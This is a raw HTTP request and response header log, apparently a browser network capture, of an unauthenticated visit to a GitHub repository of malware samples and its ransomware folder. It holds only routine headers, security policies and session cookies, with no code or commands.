productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 474
x-github-request-id: D4B6:391246:133E10:18697D:679BF749
-
Remote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/refs?type=branch HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: application/json
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=tImOL78wqoEgdzzZBVFP5KqaHRXDm%2FbZbfTtQv8g7E%2BHqxXUZDncTJBFY9XJIvWKundiD9hCEElmOBQ41L925%2Bt5WTxiMjcjfG9N18qyefTjb8IogQHFNizOxTlGKbeZPaqrdqh%2FR6gdeeYTpXAMgteT5sSm4iUSM3UrPRJLV%2FL%2FUX%2BavYBr6q4lVGQfd0J0%2B7zGwWy%2BeZl%2F3sgAsoYLdEl1EbVlSAl2KMeYx9l3kBBAxqnU1PVt3DSUEaPsHKEvXxDooghIQmAKqU6QkjNDbQ%3D%3D--6Rf544if7wSThxsB--fA93gUtmYmU9Q%2BJEk5p4eQ%3D%3D
cookie: _octo=GH1.1.354131530.1738274631
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
ResponseHTTP/2.0 200
date: Thu, 30 Jan 2025 22:03:53 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"57dd3ff551f8b3d10b3856a048bab63c"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 53
x-github-request-id: D4B6:391246:133E04:186971:679BF749
-
Remote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/tree-commit-info/master HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=tImOL78wqoEgdzzZBVFP5KqaHRXDm%2FbZbfTtQv8g7E%2BHqxXUZDncTJBFY9XJIvWKundiD9hCEElmOBQ41L925%2Bt5WTxiMjcjfG9N18qyefTjb8IogQHFNizOxTlGKbeZPaqrdqh%2FR6gdeeYTpXAMgteT5sSm4iUSM3UrPRJLV%2FL%2FUX%2BavYBr6q4lVGQfd0J0%2B7zGwWy%2BeZl%2F3sgAsoYLdEl1EbVlSAl2KMeYx9l3kBBAxqnU1PVt3DSUEaPsHKEvXxDooghIQmAKqU6QkjNDbQ%3D%3D--6Rf544if7wSThxsB--fA93gUtmYmU9Q%2BJEk5p4eQ%3D%3D
cookie: _octo=GH1.1.354131530.1738274631
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
ResponseHTTP/2.0 200
date: Thu, 30 Jan 2025 22:03:53 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"27ad9379f8d0879f6d62fe8ef65a2c3d"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 84
x-github-request-id: D4B6:391246:133E04:18696F:679BF749
-
Remote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/branch-and-tag-count HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=tImOL78wqoEgdzzZBVFP5KqaHRXDm%2FbZbfTtQv8g7E%2BHqxXUZDncTJBFY9XJIvWKundiD9hCEElmOBQ41L925%2Bt5WTxiMjcjfG9N18qyefTjb8IogQHFNizOxTlGKbeZPaqrdqh%2FR6gdeeYTpXAMgteT5sSm4iUSM3UrPRJLV%2FL%2FUX%2BavYBr6q4lVGQfd0J0%2B7zGwWy%2BeZl%2F3sgAsoYLdEl1EbVlSAl2KMeYx9l3kBBAxqnU1PVt3DSUEaPsHKEvXxDooghIQmAKqU6QkjNDbQ%3D%3D--6Rf544if7wSThxsB--fA93gUtmYmU9Q%2BJEk5p4eQ%3D%3D
cookie: _octo=GH1.1.354131530.1738274631
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
ResponseHTTP/2.0 200
date: Thu, 30 Jan 2025 22:03:53 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"6ca9b2649cfe1e58c896333ecef2b349"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 1130
x-github-request-id: D4B6:391246:133E04:186970:679BF749
-
Remote address:20.26.156.215:443RequestGET /opensearch.xml HTTP/2.0
host: github.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
date: Thu, 30 Jan 2025 22:03:53 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"2879663a9926b481c91f72f932d501eb"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 439
x-github-request-id: D4B6:391246:133E04:18696E:679BF749
-
Remote address:20.26.156.215:443RequestGET /manifest.json HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: manifest
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=tImOL78wqoEgdzzZBVFP5KqaHRXDm%2FbZbfTtQv8g7E%2BHqxXUZDncTJBFY9XJIvWKundiD9hCEElmOBQ41L925%2Bt5WTxiMjcjfG9N18qyefTjb8IogQHFNizOxTlGKbeZPaqrdqh%2FR6gdeeYTpXAMgteT5sSm4iUSM3UrPRJLV%2FL%2FUX%2BavYBr6q4lVGQfd0J0%2B7zGwWy%2BeZl%2F3sgAsoYLdEl1EbVlSAl2KMeYx9l3kBBAxqnU1PVt3DSUEaPsHKEvXxDooghIQmAKqU6QkjNDbQ%3D%3D--6Rf544if7wSThxsB--fA93gUtmYmU9Q%2BJEk5p4eQ%3D%3D
cookie: _octo=GH1.1.354131530.1738274631
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Thu, 30 Jan 2025 22:03:53 GMT
content-type: text/xml
last-modified: Thu, 30 Jan 2025 21:29:24 GMT
etag: W/"679bef34-225"
vary: Accept-Encoding, Accept, X-Requested-With
x-frame-options: DENY
strict-transport-security: max-age=31536000; includeSubDomains; preload
content-encoding: gzip
accept-ranges: bytes
set-cookie: _gh_sess=x7nKRSRS7ATEpPyf%2FIwCRmHOQcjDDpOADnzhQ1oalC%2FG6q8bjrCZHn1iEf7c690VfXlxY56zYc2r8UZhRsCEHKwA1aQ3pDBAxThAXW9l0P93jnns3ZUCfYbVs5hkzZLiWXOG4kdmuqWJHy4oy7YXsl2ubHNVYKu80Ev%2BqfJHOjtPpY2CrlW6bwhPJTLmtAIqdwoau8W8mzh6dBipb14Bk6PxEFxo5ZycK%2B8O5x0FuyMjlc2j7PWGLtIEIKu4iyTEsPYosbZLnbLc9Sa9nhZ3zQ%3D%3D--1%2F0hMSzemvyO7c%2BH--OMGzD9vJ9cSDltLf2nnHUQ%3D%3D; Path=/; HttpOnly; Secure; SameSite=Lax
set-cookie: _octo=GH1.1.1780097699.1738274633; Path=/; Domain=github.com; Expires=Fri, 30 Jan 2026 22:03:53 GMT; Secure; SameSite=Lax
set-cookie: logged_in=no; Path=/; Domain=github.com; Expires=Fri, 30 Jan 2026 22:03:53 GMT; HttpOnly; Secure; SameSite=Lax
content-length: 328
x-github-request-id: D4B6:391246:133E0C:186978:679BF749
-
Remote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/tree/master/ransomwares HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: text/html, application/xhtml+xml, application/json
dnt: 1
turbo-visit: true
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
x-react-app-name: repos-overview
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=tImOL78wqoEgdzzZBVFP5KqaHRXDm%2FbZbfTtQv8g7E%2BHqxXUZDncTJBFY9XJIvWKundiD9hCEElmOBQ41L925%2Bt5WTxiMjcjfG9N18qyefTjb8IogQHFNizOxTlGKbeZPaqrdqh%2FR6gdeeYTpXAMgteT5sSm4iUSM3UrPRJLV%2FL%2FUX%2BavYBr6q4lVGQfd0J0%2B7zGwWy%2BeZl%2F3sgAsoYLdEl1EbVlSAl2KMeYx9l3kBBAxqnU1PVt3DSUEaPsHKEvXxDooghIQmAKqU6QkjNDbQ%3D%3D--6Rf544if7wSThxsB--fA93gUtmYmU9Q%2BJEk5p4eQ%3D%3D
cookie: _octo=GH1.1.354131530.1738274631
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Thu, 30 Jan 2025 22:03:55 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"089e2612a542ebd5c8a1280b10e10c97"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
x-html-safe: 516dc87321b4472cf70159fce1d4e52f0504b13b6d10b9d2e3bd177803b6728a
x-github-request-id: D4B6:391246:133E94:186A27:679BF749
-
Remote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/latest-commit/master/ransomwares HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=tImOL78wqoEgdzzZBVFP5KqaHRXDm%2FbZbfTtQv8g7E%2BHqxXUZDncTJBFY9XJIvWKundiD9hCEElmOBQ41L925%2Bt5WTxiMjcjfG9N18qyefTjb8IogQHFNizOxTlGKbeZPaqrdqh%2FR6gdeeYTpXAMgteT5sSm4iUSM3UrPRJLV%2FL%2FUX%2BavYBr6q4lVGQfd0J0%2B7zGwWy%2BeZl%2F3sgAsoYLdEl1EbVlSAl2KMeYx9l3kBBAxqnU1PVt3DSUEaPsHKEvXxDooghIQmAKqU6QkjNDbQ%3D%3D--6Rf544if7wSThxsB--fA93gUtmYmU9Q%2BJEk5p4eQ%3D%3D
cookie: _octo=GH1.1.354131530.1738274631
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Thu, 30 Jan 2025 22:03:55 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"2f35a548192aa4c7f03cb33866cc9d1e"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
